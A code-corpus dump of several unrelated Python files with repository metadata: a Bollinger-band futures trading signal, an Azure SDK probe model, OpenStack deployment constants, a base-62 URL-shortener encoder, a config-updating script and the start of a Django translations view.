    """Short-side Aberration (Bollinger breakout) signal.

    Opens a short when price closes below the lower Bollinger band and
    covers when price closes back above the mid-band stop. State is
    persisted to / restored from CSV files under get_dss().
    """

    #----------------------------------------------------------------------
    def __init__(self, portfolio, vtSymbol):
        self.type = 'kong'

        # Strategy parameters
        self.bollWindow = 80     # Bollinger window size
        self.bollDev = 2         # Bollinger band deviation
        self.fixedSize = 1       # volume per trade
        self.initBars = 90       # days of data used for initialization
        self.minx = 'min5'

        # Transient strategy variables
        self.bollUp = 0          # upper Bollinger band
        self.bollDown = 0        # lower Bollinger band

        # Variables that must be persisted
        self.stop = 0            # stop level (mid band) for the short position

        Signal.__init__(self, portfolio, vtSymbol)

    #----------------------------------------------------------------------
    def load_param(self):
        """Load per-product parameters from the shared param CSV, if any."""
        filename = get_dss() + 'fut/cfg/signal_aberration_'+self.type+'_param.csv'
        if os.path.exists(filename):
            df = pd.read_csv(filename)
            # Match on the product (pz) of this contract.
            df = df[ df.pz == get_contract(self.vtSymbol).pz ]
            if len(df) > 0:
                rec = df.iloc[0,:]
                self.bollWindow = rec.bollWindow
                self.bollDev = rec.bollDev
                print('成功加载策略参数', self.bollWindow, self.bollDev)

    #----------------------------------------------------------------------
    def set_param(self, param_dict):
        """Apply externally supplied bollWindow / bollDev parameters."""
        if 'bollWindow' in param_dict:
            self.bollWindow = param_dict['bollWindow']
            print('成功设置策略参数 self.bollWindow: ',self.bollWindow)
        if 'bollDev' in param_dict:
            self.bollDev = param_dict['bollDev']
            print('成功设置策略参数 self.bollDev: ',self.bollDev)

    #----------------------------------------------------------------------
    def onBar(self, bar, minx='min5'):
        """Dispatch a newly pushed bar to the matching handler."""
        self.bar = bar
        if minx == 'min1':
            self.on_bar_min1(bar)
        else:
            self.on_bar_minx(bar)

    def on_bar_min1(self, bar):
        # 1-minute bars are intentionally ignored by this signal.
        pass

    def on_bar_minx(self, bar):
        # Feed the bar; act only once the array manager is warmed up.
        self.am.updateBar(bar)
        if not self.am.inited:
            return
        self.calculateIndicator()      # compute indicators
        self.generateSignal(bar)       # evaluate rules, emit trade orders

    #----------------------------------------------------------------------
    def calculateIndicator(self):
        """Recompute the Bollinger bands and the mid-band stop."""
        self.bollUp, self.bollDown = self.am.boll(self.bollWindow, self.bollDev)
        self.stop = (self.bollUp + self.bollDown)/2

    #----------------------------------------------------------------------
    def generateSignal(self, bar):
        """Short-side entry/exit rules."""
        # Currently flat: open a short on a close below the lower band.
        if self.unit == 0:
            if bar.close < self.bollDown:
                self.short(bar.close, self.fixedSize)
        # Holding a short: cover once price closes above the stop.
        elif self.unit < 0:
            if bar.close > self.stop:
                self.cover(bar.close, abs(self.unit))

    #----------------------------------------------------------------------
    def load_var(self):
        """Restore position and open-result state from the var CSV."""
        filename = get_dss() + 'fut/check/signal_aberration_'+self.type+'_var.csv'
        if os.path.exists(filename):
            df = pd.read_csv(filename)
            df = df[df.vtSymbol == self.vtSymbol]
            if len(df) > 0:
                rec = df.iloc[-1,:]        # take the most recent record
                self.unit = rec.unit
                if rec.has_result == 1:
                    self.result = SignalResult()
                    self.result.unit = rec.result_unit
                    self.result.entry = rec.result_entry
                    self.result.exit = rec.result_exit
                    self.result.pnl = rec.result_pnl

    #----------------------------------------------------------------------
    def save_var(self):
        """Append the current state as one row of the var CSV."""
        r = []
        if self.result is None:
            r = [ [self.portfolio.result.date,self.vtSymbol, self.unit, \
                   0, 0, 0, 0, 0 ] ]
        else:
            r = [ [self.portfolio.result.date,self.vtSymbol, self.unit, \
                   1, self.result.unit, self.result.entry, self.result.exit, self.result.pnl ] ]
        df = pd.DataFrame(r, columns=['datetime','vtSymbol','unit', \
                                      'has_result','result_unit','result_entry','result_exit', 'result_pnl'])
        filename = get_dss() + 'fut/check/signal_aberration_'+self.type+'_var.csv'
        df.to_csv(filename, index=False, mode='a', header=False)

    #----------------------------------------------------------------------
    def open(self, price, change):
        """Open a position and append the fill to the deal log."""
        self.unit += change
        if not self.result:
            self.result = SignalResult()
        self.result.open(price, change)

        r = [ [self.bar.date+' '+self.bar.time, '多' if change>0 else '空', '开', \
               abs(change), price, 0 ] ]
        df = pd.DataFrame(r, columns=['datetime','direction','offset','volume','price','pnl' ])
        filename = get_dss() + 'fut/deal/signal_aberration_'+self.type+'_' + self.vtSymbol + '.csv'
        df.to_csv(filename, index=False, mode='a', header=False)

    #----------------------------------------------------------------------
    def close(self, price):
        """Close the position, log the fill with pnl, clear the result."""
        self.unit = 0
        self.result.close(price)

        r = [ [self.bar.date+' '+self.bar.time, '', '平', \
               0, price, self.result.pnl ] ]
        df = pd.DataFrame(r, columns=['datetime','direction','offset','volume','price','pnl' ])
        filename = get_dss() + 'fut/deal/signal_aberration_'+self.type+'_' + self.vtSymbol + '.csv'
        df.to_csv(filename, index=False, mode='a', header=False)

        self.result = None
########################################################################
class Fut_AberrationPortfolio(Portfolio):
    """Portfolio currently wired to the short-side Aberration signal only."""

    #----------------------------------------------------------------------
    def __init__(self, engine, symbol_list, signal_param={}):
        # Alternative wirings kept for reference:
        #Portfolio.__init__(self, Fut_AberrationSignal_Duo, engine, symbol_list, signal_param, Fut_AberrationSignal_Kong, signal_param)
        #Portfolio.__init__(self, Fut_AberrationSignal_Duo, engine, symbol_list, signal_param, None, None)
        Portfolio.__init__(self, Fut_AberrationSignal_Kong, engine, symbol_list, signal_param, None, None)
        self.name = 'aberration'

    #----------------------------------------------------------------------
    def _bc_newSignal(self, signal, direction, offset, price, volume):
        """
        Filter trade signals and send qualifying orders.
        Computes the real traded price and volume.
        """
        # Size by 1% of portfolio value per contract size...
        multiplier = self.portfolioValue * 0.01 / get_contract(signal.vtSymbol).size
        multiplier = int(round(multiplier, 0))
        #print(multiplier)
        # ...but the computed size is then overridden to a fixed 1 lot.
        # NOTE(review): the two lines above are dead code as a result —
        # confirm whether the fixed size is intentional.
        multiplier = 1

        #print(self.posDict)
        # Track the per-contract net position.
        if direction == DIRECTION_LONG:
            self.posDict[signal.vtSymbol] += volume*multiplier
        else:
            self.posDict[signal.vtSymbol] -= volume*multiplier
        #print(self.posDict)

        # Round the price to the contract's tick size.
        priceTick = get_contract(signal.vtSymbol).price_tick
        price = int(round(price/priceTick, 0)) * priceTick

        self.engine._bc_sendOrder(signal.vtSymbol, direction, offset, price, volume*multiplier, self.name)

        # Record the fill in the daily result.
        trade = TradeData(self.result.date, signal.vtSymbol, direction, offset, price, volume*multiplier)
        # l = self.tradeDict.setdefault(self.result.date, [])
        # l.append(trade)
        self.result.updateTrade(trade)
| [
"[email protected]"
]
| |
50faf2e04d91afe1be4128df90c192dd546b38fe | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-network/azure/mgmt/network/v2018_06_01/models/application_gateway_probe.py | d04d03bf97211b720086089e3307cafdb95580c8 | [
"MIT"
]
| permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 4,616 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayProbe(SubResource):
    """Probe of the application gateway.

    :param id: Resource ID.
    :type id: str
    :param protocol: The protocol used for the probe. Possible values are
     'Http' and 'Https'. Possible values include: 'Http', 'Https'
    :type protocol: str or
     ~azure.mgmt.network.v2018_06_01.models.ApplicationGatewayProtocol
    :param host: Host name to send the probe to.
    :type host: str
    :param path: Relative path of probe. Valid path starts from '/'. Probe is
     sent to <Protocol>://<host>:<port><path>
    :type path: str
    :param interval: The probing interval in seconds. This is the time
     interval between two consecutive probes. Acceptable values are from 1
     second to 86400 seconds.
    :type interval: int
    :param timeout: the probe timeout in seconds. Probe marked as failed if
     valid response is not received with this timeout period. Acceptable values
     are from 1 second to 86400 seconds.
    :type timeout: int
    :param unhealthy_threshold: The probe retry count. Backend server is
     marked down after consecutive probe failure count reaches
     UnhealthyThreshold. Acceptable values are from 1 second to 20.
    :type unhealthy_threshold: int
    :param pick_host_name_from_backend_http_settings: Whether the host header
     should be picked from the backend http settings. Default value is false.
    :type pick_host_name_from_backend_http_settings: bool
    :param min_servers: Minimum number of servers that are always marked
     healthy. Default value is 0.
    :type min_servers: int
    :param match: Criterion for classifying a healthy probe response.
    :type match:
     ~azure.mgmt.network.v2018_06_01.models.ApplicationGatewayProbeHealthResponseMatch
    :param provisioning_state: Provisioning state of the backend http settings
     resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
    :type provisioning_state: str
    :param name: Name of the probe that is unique within an Application
     Gateway.
    :type name: str
    :param etag: A unique read-only string that changes whenever the resource
     is updated.
    :type etag: str
    :param type: Type of the resource.
    :type type: str
    """

    # Serialization map (python attribute -> wire key and type), presumably
    # consumed by the SDK's (de)serializer — this class is AutoRest-generated
    # (see the file header), so keep its structure exactly as generated.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'protocol': {'key': 'properties.protocol', 'type': 'str'},
        'host': {'key': 'properties.host', 'type': 'str'},
        'path': {'key': 'properties.path', 'type': 'str'},
        'interval': {'key': 'properties.interval', 'type': 'int'},
        'timeout': {'key': 'properties.timeout', 'type': 'int'},
        'unhealthy_threshold': {'key': 'properties.unhealthyThreshold', 'type': 'int'},
        'pick_host_name_from_backend_http_settings': {'key': 'properties.pickHostNameFromBackendHttpSettings', 'type': 'bool'},
        'min_servers': {'key': 'properties.minServers', 'type': 'int'},
        'match': {'key': 'properties.match', 'type': 'ApplicationGatewayProbeHealthResponseMatch'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        # 'id' (and any other base fields) are consumed by SubResource.
        super(ApplicationGatewayProbe, self).__init__(**kwargs)
        # Every probe-specific field defaults to None when not supplied.
        self.protocol = kwargs.get('protocol', None)
        self.host = kwargs.get('host', None)
        self.path = kwargs.get('path', None)
        self.interval = kwargs.get('interval', None)
        self.timeout = kwargs.get('timeout', None)
        self.unhealthy_threshold = kwargs.get('unhealthy_threshold', None)
        self.pick_host_name_from_backend_http_settings = kwargs.get('pick_host_name_from_backend_http_settings', None)
        self.min_servers = kwargs.get('min_servers', None)
        self.match = kwargs.get('match', None)
        self.provisioning_state = kwargs.get('provisioning_state', None)
        self.name = kwargs.get('name', None)
        self.etag = kwargs.get('etag', None)
        self.type = kwargs.get('type', None)
| [
"[email protected]"
]
| |
30aec9891a46dbbe643a92b765ac61393ad4a416 | 56bd9b3518f21080a0493f5330249bf5e85289fd | /engineering/common/econstants.py | 6c98788eeb4a4ac58e6294df9a553babe863a6f2 | [
"Apache-2.0"
]
| permissive | kevin-zhangsen/badam | da680bf8669722b5bc922381537bc4762fa5c228 | 6823f7dcd7c1b54c3b38edeffe59c16317598a2c | refs/heads/master | 2020-04-01T13:43:03.300155 | 2015-10-29T01:07:46 | 2015-10-29T01:07:46 | 45,371,347 | 2 | 0 | null | 2015-11-02T04:02:50 | 2015-11-02T04:02:47 | null | UTF-8 | Python | false | false | 7,858 | py | __author__ = 'nash.xiejun'
import os
class OperationType(object):
    """Top-level operations this deployment tool can perform."""
    CFG_ALL_IN_ONE = 'cfg-all-in-one'
    CFG_HOST_NAME = 'cfg-hostname'
    DEPLOY_CASCADING = 'deploy-cascade-openstack'
    DEPLOY_HYBRID_CLOUD = 'deploy-hybrid-cloud'
class EndpointType(object):
    """Keystone service-type identifiers used when registering endpoints."""
    COMPUTE = 'compute'
    VOLUME = 'volume'
    VOLUME2 = 'volumev2'
    IMAGE = 'image'
    NETWORK = 'network'
    ORCHESTRATION = 'orchestration'
    EC2 = 'ec2'
    METERING = 'metering'
class EndpointURL(object):
    """Endpoint URL templates; the single '%s' is the service host address."""
    COMPUTE = 'http://%s:8774/v2/$(tenant_id)s'
    VOLUME = 'http://%s:8776/v1/$(tenant_id)s'
    VOLUME2 = 'http://%s:8776/v2/$(tenant_id)s'
    IMAGE = 'http://%s:9292/'
    NETWORK = 'http://%s:9696/'
    ORCHESTRATION = 'http://%s:8004/v1/$(tenant_id)s'
    EC2 = 'http://%s:8773/services/Cloud'
    METERING = 'http://%s:8777/'
class ServiceName(object):
    """Canonical OpenStack service names (also used as directory names)."""
    NOVA = 'nova'
    CINDER = 'cinder'
    GLANCE = 'glance'
    NEUTRON = 'neutron'
    KEYSTONE = 'keystone'
class PathConfigFile(object):
    """Relative paths of the OpenStack service configuration files."""
    ROOT = os.path.sep
    ETC = 'etc'
    PLUGINS = 'plugins'
    ML_2 = 'ml2'
    ML2_CONF = 'ml2_conf.ini'

    NOVA_CONF = 'nova.conf'
    # etc/nova/nova.conf
    NOVA = os.path.join(ETC, ServiceName.NOVA, NOVA_CONF)

    NOVA_COMPUTE_CONF = 'nova-compute.conf'
    # etc/nova/nova-compute.conf
    NOVA_COMPUTE = os.path.join(ETC, ServiceName.NOVA, NOVA_COMPUTE_CONF)

    NEUTRON_CONF = 'neutron.conf'
    # etc/neutron/neutron.conf
    NEUTRON = os.path.join(ETC, ServiceName.NEUTRON, NEUTRON_CONF)

    # etc/neutron/plugins/ml2/ml2_conf.ini
    ML2 = os.path.join(ETC, ServiceName.NEUTRON, PLUGINS, ML_2, ML2_CONF)

    L3_PROXY_INI = 'l3_proxy.ini'
    # etc/neutron/l3_proxy.ini
    L3_PROXY = os.path.join(ETC, ServiceName.NEUTRON, L3_PROXY_INI)

    # etc/keystone/keystone.conf
    KEYSTONE_CONF = 'keystone.conf'
    KEYSTONE = os.path.join(ETC, ServiceName.KEYSTONE, KEYSTONE_CONF)

    # etc/glance/glance.conf
    GLANCE_CONF = 'glance.conf'
    GLANCE = os.path.join(ETC, ServiceName.GLANCE, GLANCE_CONF)

    # etc/cinder/cinder.conf
    CINDER_CONF = 'cinder.conf'
    CINDER = os.path.join(ETC, ServiceName.CINDER, CINDER_CONF)
class PathTriCircle(object):
    """Source-tree layout of the Tricircle cascading patches and proxies.

    PATCH_TO_PATH maps a patch/proxy short name to its directory inside
    the unpacked tricircle-master tree.
    """
    TRICIRCLE = 'tricircle-master'
    JUNO_PATCHES = 'juno-patches'
    NOVA_PROXY = 'novaproxy'
    CINDER_PROXY = 'cinderproxy'
    NEUTRON_PROXY = 'neutronproxy'
    L2_PROXY = 'l2proxy'
    L3_PROXY = 'l3proxy'
    GLANCE_SYNC = 'glancesync'
    GLANCE_STORE = 'glance_store'

    PATCH_CINDER_CASCADED_TIMESTAMP = 'timestamp-query-patch'
    PATCH_GLANCE_LOCATION = 'glance_location_patch'
    PATCH_GLANCE_STORE = 'glance_store_patch'
    PATCH_NEUTRON_CASCADED_BIG2LAYER = 'neutron_cascaded_big2layer_patch'
    PATCH_NEUTRON_CASCADED_L3 = 'neutron_cascaded_l3_patch'
    PATCH_NEUTRON_CASCADED_TIMESTAMP = 'neutron_timestamp_cascaded_patch'
    PATCH_NEUTRON_CASCADING_BIG2LAYER = 'neutron_cascading_big2layer_patch'
    PATCH_NEUTRON_CASCADING_L3 = 'neutron_cascading_l3_patch'
    PATCH_NOVA_SCHEDULING = 'nova_scheduling_patch'

    # tricircle-master/glancesync
    PATH_CASCADING_GLANCE_SYNC = os.path.join(TRICIRCLE, GLANCE_SYNC)
    # tricircle-master/cinderproxy
    PATH_PROXY_CINDER = os.path.join(TRICIRCLE, CINDER_PROXY)
    # tricircle-master/neutronproxy/l2proxy
    PATH_PROXY_NEUTRON_L2 = os.path.join(TRICIRCLE, NEUTRON_PROXY, L2_PROXY)
    # tricircle-master/neutronproxy/l3proxy
    PATH_PROXY_NEUTRON_L3 = os.path.join(TRICIRCLE, NEUTRON_PROXY, L3_PROXY)
    # tricircle-master/novaproxy
    PATH_PROXY_NOVA = os.path.join(TRICIRCLE, NOVA_PROXY)
    # tricircle-master/juno-patches/cinder/timestamp-query-patch
    PATH_PATCH_CINDER_CASCADED_TIMESTAMP = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.CINDER, PATCH_CINDER_CASCADED_TIMESTAMP)
    # tricircle-master/juno-patches/glance/glance_location_patch
    PATH_PATCH_GLANCE_LOCATION = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.GLANCE, PATCH_GLANCE_LOCATION)
    # tricircle-master/juno-patches/glance_store/glance_store_patch/
    PATH_PATCH_GLANCE_STORE = os.path.join(TRICIRCLE, JUNO_PATCHES, GLANCE_STORE, PATCH_GLANCE_STORE)
    # tricircle-master/juno-patches/neutron/neutron_cascaded_big2layer_patch
    PATH_PATCH_NEUTRON_CASCADED_BIG2LAYER = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADED_BIG2LAYER)
    # tricircle-master/juno-patches/neutron/neutron_cascaded_l3_patch
    PATH_PATCH_NEUTRON_CASCADED_L3 = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADED_L3)
    # tricircle-master/juno-patches/neutron/neutron_cascading_big2layer_patch
    PATH_PATCH_NEUTRON_CASCADING_BIG2LAYER = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADING_BIG2LAYER)
    # tricircle-master/juno-patches/neutron/neutron_cascading_l3_patch
    PATH_PATCH_NEUTRON_CASCADING_L3 = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADING_L3)
    # tricircle-master/juno-patches/neutron/neutron_timestamp_cascaded_patch
    PATH_PATCH_NEUTRON_CASCADED_TIMESTAMP = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NEUTRON, PATCH_NEUTRON_CASCADED_TIMESTAMP)
    # tricircle-master/juno-patches/nova/nova_scheduling_patch
    PATH_PATCH_NOVA_SCHEDULING = os.path.join(TRICIRCLE, JUNO_PATCHES, ServiceName.NOVA, PATCH_NOVA_SCHEDULING)

    PATCH_TO_PATH = {
        PATCH_NOVA_SCHEDULING : PATH_PATCH_NOVA_SCHEDULING,
        PATCH_NEUTRON_CASCADING_BIG2LAYER : PATH_PATCH_NEUTRON_CASCADING_BIG2LAYER,
        PATCH_NEUTRON_CASCADING_L3 : PATH_PATCH_NEUTRON_CASCADING_L3,
        PATCH_NEUTRON_CASCADED_BIG2LAYER : PATH_PATCH_NEUTRON_CASCADED_BIG2LAYER,
        PATCH_NEUTRON_CASCADED_L3 : PATH_PATCH_NEUTRON_CASCADED_L3,
        PATCH_NEUTRON_CASCADED_TIMESTAMP : PATH_PATCH_NEUTRON_CASCADED_TIMESTAMP,
        PATCH_CINDER_CASCADED_TIMESTAMP : PATH_PATCH_CINDER_CASCADED_TIMESTAMP,
        NOVA_PROXY : PATH_PROXY_NOVA,
        CINDER_PROXY : PATH_PROXY_CINDER,
        L2_PROXY : PATH_PROXY_NEUTRON_L2,
        L3_PROXY : PATH_PROXY_NEUTRON_L3
    }
class PathHybridCloud(object):
    """Source-tree layout of the hybrid-cloud patches and their install target."""
    HYBRID_CLOUD_PATCHES = 'hybrid_cloud_patches'
    THIRD_LIB = '3rd_lib'
    PYTHON = 'python'
    JAVA = 'java'
    OPENSTACK_DASHBOARD = 'openstack_dashboard'
    WSGI = 'wsgi'
    ROOT = os.path.sep
    #/usr/share/openstack-dashboard/openstack_dashboard/

    # hybrid_cloud_patches/3rd_lib/java
    PATH_THIRD_LIB_JAVA = os.path.join(HYBRID_CLOUD_PATCHES, THIRD_LIB, JAVA)
    # hybrid_cloud_patches/3rd_lib/python
    PATH_THIRD_LIB_PYTHON = os.path.join(HYBRID_CLOUD_PATCHES, THIRD_LIB, PYTHON)
    # hybrid_cloud_patches/java
    PATH_PATCHES_JAVA = os.path.join(HYBRID_CLOUD_PATCHES, JAVA)
    # hybrid_cloud_patches/python
    PATH_PATCHES_PYTHON = os.path.join(HYBRID_CLOUD_PATCHES, PYTHON)
    # hybrid_cloud_patches/wsgi
    PATH_PATCHES_OPENSTACK_DASHBOARD = os.path.join(HYBRID_CLOUD_PATCHES, WSGI)
    # /usr/share/openstack-dashboard/
    PATH_INSTALL_PATCH_OPENSTACK_DASHBOARD = ''.join([ROOT, os.path.join('usr', 'share', 'openstack-dashboard')])
class PathTricircleConfigFile(object):
    """Full relative paths of the config files inside each Tricircle proxy."""
    PROXY_CINDER = os.path.join(PathTriCircle.PATH_PROXY_CINDER, PathConfigFile.CINDER)
    PROXY_NEUTRON_L2 = os.path.join(PathTriCircle.PATH_PROXY_NEUTRON_L2, PathConfigFile.ML2)
    PROXY_NEUTRON_L3 = os.path.join(PathTriCircle.PATH_PROXY_NEUTRON_L3, PathConfigFile.L3_PROXY)
    PROXY_NOVA_COMPUTE = os.path.join(PathTriCircle.PATH_PROXY_NOVA, PathConfigFile.NOVA_COMPUTE)
    PROXY_NOVA = os.path.join(PathTriCircle.PATH_PROXY_NOVA, PathConfigFile.NOVA)
class ConfigReplacement(object):
    """Placeholder keys substituted into config templates during deployment."""
    REGION_NAME = 'region_name'
    CASCADED_NODE_IP = 'cascaded_node_ip'
    CASCADING_NODE_IP = 'cascading_node_ip'
    CINDER_TENANT_ID = 'cinder_tenant_id'
    AVAILABILITY_ZONE = 'availability_zone'
    CASCADING_OS_REGION_NAME = 'cascading_os_region_name'
ML2_LOCAL_IP = 'ml2_local_ip' | [
"[email protected]"
]
| |
200a81f58579323116fcf06d8ac860193ba85b33 | c954904d3a3259f0bee4bc3942998c30f4714e68 | /shortener/shorturl/__init__.py | 841083c46d1e89eca6a52cddcb079e6658197c16 | []
| no_license | Alodhaib/django-shortener-example | 9443e51191086fa1321468eb3fdefa137c25e330 | d037c913ed18e0a7b24865b7f4f5aaf68df2cca3 | refs/heads/master | 2021-01-24T10:06:40.965556 | 2013-05-11T16:01:13 | 2013-05-11T16:01:13 | 69,673,280 | 0 | 0 | null | 2016-09-30T14:22:22 | 2016-09-30T14:22:22 | null | UTF-8 | Python | false | false | 2,822 | py | #!/usr/bin/env python
#
# Converts any integer into a base [BASE] number. I have chosen 62
# as it is meant to represent the integers using all the alphanumeric
# characters, [no special characters] = {0..9}, {A..Z}, {a..z}
#
# I plan on using this to shorten the representation of possibly long ids,
# a la url shortenters
#
# saturate() takes the base 62 key, as a string, and turns it back into an integer
# dehydrate() takes an integer and turns it into the base 62 string
#
import math
import sys
BASE = 62

# Offsets mapping base-62 digit characters onto their integer values:
# 'A'..'Z' -> 10..35 (ord('A') == 65, 65 - 55 == 10)
UPPERCASE_OFFSET = 55
# 'a'..'z' -> 36..61 (ord('a') == 97, 97 - 61 == 36)
LOWERCASE_OFFSET = 61
# '0'..'9' -> 0..9 (ord('0') == 48)
DIGIT_OFFSET = 48
def true_ord(char):
    """
    Turns a digit [char] in character representation
    from the number system with base [BASE] into an integer.

    Raises ValueError for any character outside 0-9, A-Z, a-z.
    """
    # Compare against the ASCII range explicitly: str.isdigit() is also
    # true for non-ASCII Unicode digits (e.g. Arabic-Indic numerals),
    # which would silently map to wrong values under the ASCII-based
    # DIGIT_OFFSET instead of being rejected.
    if '0' <= char <= '9':
        return ord(char) - DIGIT_OFFSET
    elif 'A' <= char <= 'Z':
        return ord(char) - UPPERCASE_OFFSET
    elif 'a' <= char <= 'z':
        return ord(char) - LOWERCASE_OFFSET
    else:
        raise ValueError("%s is not a valid character" % char)
def true_chr(integer):
    """
    Map an integer digit of the base-[BASE] number system to its
    character representation: 0-9 -> '0'-'9', 10-35 -> 'A'-'Z',
    36-61 -> 'a'-'z'.
    """
    if integer < 10:
        return chr(integer + DIGIT_OFFSET)
    if 10 <= integer <= 35:
        return chr(integer + UPPERCASE_OFFSET)
    if 36 <= integer < 62:
        return chr(integer + LOWERCASE_OFFSET)
    raise ValueError("%d is not a valid integer in the range of base %d" % (integer, BASE))
def saturate(key):
    """
    Turn the base [BASE] number [key] into an integer.

    Uses Horner's scheme with pure integer arithmetic. The previous
    int(math.pow(BASE, idx)) implementation went through floats, which
    lose precision once BASE**idx exceeds 2**53 and would corrupt the
    decoded value for long keys.
    """
    int_sum = 0
    for char in key:
        int_sum = int_sum * BASE + true_ord(char)
    return int_sum
def dehydrate(integer):
    """
    Turn an integer [integer] into a base [BASE] number
    in string representation.
    """
    # We won't step into the while-loop if integer is 0,
    # so that case is handled up front.
    if integer == 0:
        return '0'

    string = ""
    while integer > 0:
        # divmod uses floor division; the original "integer /= BASE"
        # becomes float true division on Python 3 (and under
        # "from __future__ import division"), breaking the loop.
        integer, remainder = divmod(integer, BASE)
        string = true_chr(remainder) + string
    return string
if __name__ == '__main__':
    # Rough sanity check / CLI driver.
    # print()/range() forms behave identically on Python 2 and 3;
    # the original print statements and xrange were Python-2-only.
    if sys.argv[1] == '-tests':
        # Not really unit tests, just a round-trip check over 0..999.
        passed_tests = True
        for i in range(0, 1000):
            passed_tests &= (i == saturate(dehydrate(i)))
        print(passed_tests)
    else:
        user_input = sys.argv[2]
        try:
            if sys.argv[1] == '-s':
                print(saturate(user_input))
            elif sys.argv[1] == '-d':
                print(dehydrate(int(user_input)))
            else:
                print("I don't understand option %s" % sys.argv[1])
        except ValueError as e:
            print(e)
"[email protected]"
]
| |
6b8e063df39d1bc4647cc63b5d37bbb741026f94 | 84856442c382b0b670246636d378beb095effa0a | /dev_cloud/cc1/pkg/node/usr/sbin/cc1_node_update_config | e017f54f299318ea27deee56590d47e9bbbd9034 | [
"Apache-2.0",
"LicenseRef-scancode-philippe-de-muyter"
]
| permissive | Dev-Cloud-Platform/Dev-Cloud | f50cc3292245156c4cf55942e4426fda22443fd6 | b2fb9f4318aeb6dde1e8babca32da527943f1fb4 | refs/heads/master | 2020-12-29T02:43:14.022401 | 2017-05-05T07:18:21 | 2017-05-05T07:18:21 | 28,969,864 | 1 | 1 | null | 2015-01-14T16:46:57 | 2015-01-08T14:36:52 | Python | UTF-8 | Python | false | false | 1,615 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# @cond LICENSE
#
# Copyright [2010-2013] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @endcond LICENSE
"""
@author Maciej Nabozny <[email protected]>
"""
import sys
def set_value(key, value, path='/etc/cc1/node/config.py'):
    """Rewrite [path] so that every line starting with [key] becomes
    key="value"; all other lines are kept verbatim (output has no
    trailing newline, as before).

    The new [path] parameter defaults to the CC1 node config file, so
    existing two-argument calls keep working, while the function becomes
    testable against an arbitrary file.

    Fixes vs. the original: file handles are closed even on error (via
    with-blocks) and the Python-2-only print statement is replaced with
    a form valid on both Python 2 and 3.

    Returns 0 on success (the CLI wrapper passes this to sys.exit).
    """
    print("NODE: Updating config: %s:%s" % (key, value))

    # Read everything first so the same file can be rewritten in place.
    lines = []
    with open(path, 'r') as config:
        for line in config:
            # Strip the single trailing newline, if any (idiomatic
            # equivalent of the original line[:-1] slicing).
            line = line.rstrip('\n')
            if line.startswith(key):
                # NOTE(review): startswith() also rewrites longer keys
                # sharing this prefix (key 'a' matches 'abc=...');
                # preserved as-is to avoid changing behavior.
                lines.append(key + '="' + str(value) + '"')
            else:
                lines.append(line)

    with open(path, 'w') as config:
        config.write('\n'.join(lines))
    return 0
if __name__ == "__main__":
    # CLI entry point: cc1_node_update_config <key> <new_value>
    try:
        if len(sys.argv) == 3:
            sys.exit(set_value(sys.argv[1], sys.argv[2]))
        else:
            print("Usage: %s [key] new_value" % sys.argv[0])
            sys.exit(1)
    except Exception as e:
        # sys.stderr.write() replaces the Python-2-only
        # "print >> sys.stderr" chevron syntax; SystemExit from the
        # sys.exit() calls above is a BaseException and still propagates.
        sys.stderr.write("ERROR: %s\n" % str(e))
        sys.exit(10)
| [
"[email protected]"
]
| ||
9ebffdc2c7a97a1fcd82205153e8ae6ff5acd96a | 4dbdcdd777897567ede8343299b5dacf59580479 | /translations/views.py | 9cffdce4a4af841a082619776557b448ebeada5a | [
"BSD-3-Clause"
]
| permissive | OpenTTD-Ladder/yawd-translations | 88cae158d561034ca6e69311fb8be9acc2b73627 | 913025f4361883408ca480a8e7c9ea90add0a9db | refs/heads/master | 2021-01-15T20:12:59.548959 | 2013-07-19T09:06:07 | 2013-07-19T09:06:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,508 | py | import os, shutil
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.management.commands.compilemessages import has_bom
from django.core.management.commands.makemessages import make_messages, handle_extensions
from django.http import Http404
from django.http import HttpResponseRedirect
from django.utils.encoding import smart_str
from django.utils.importlib import import_module
from django.utils.text import capfirst
from django.utils.translation import to_locale, ugettext as _
from django.views.generic import TemplateView, FormView
from forms import PoFileForm
from models import Language
from utils import compile_message_file, concat_message_files, reset_translations
class GenerateTranslationMessagesView(TemplateView):
    """Ajax admin view that (re)generates the unified gettext catalog for
    one :class:`Language`.

    For every installed application it collects/updates that app's .po
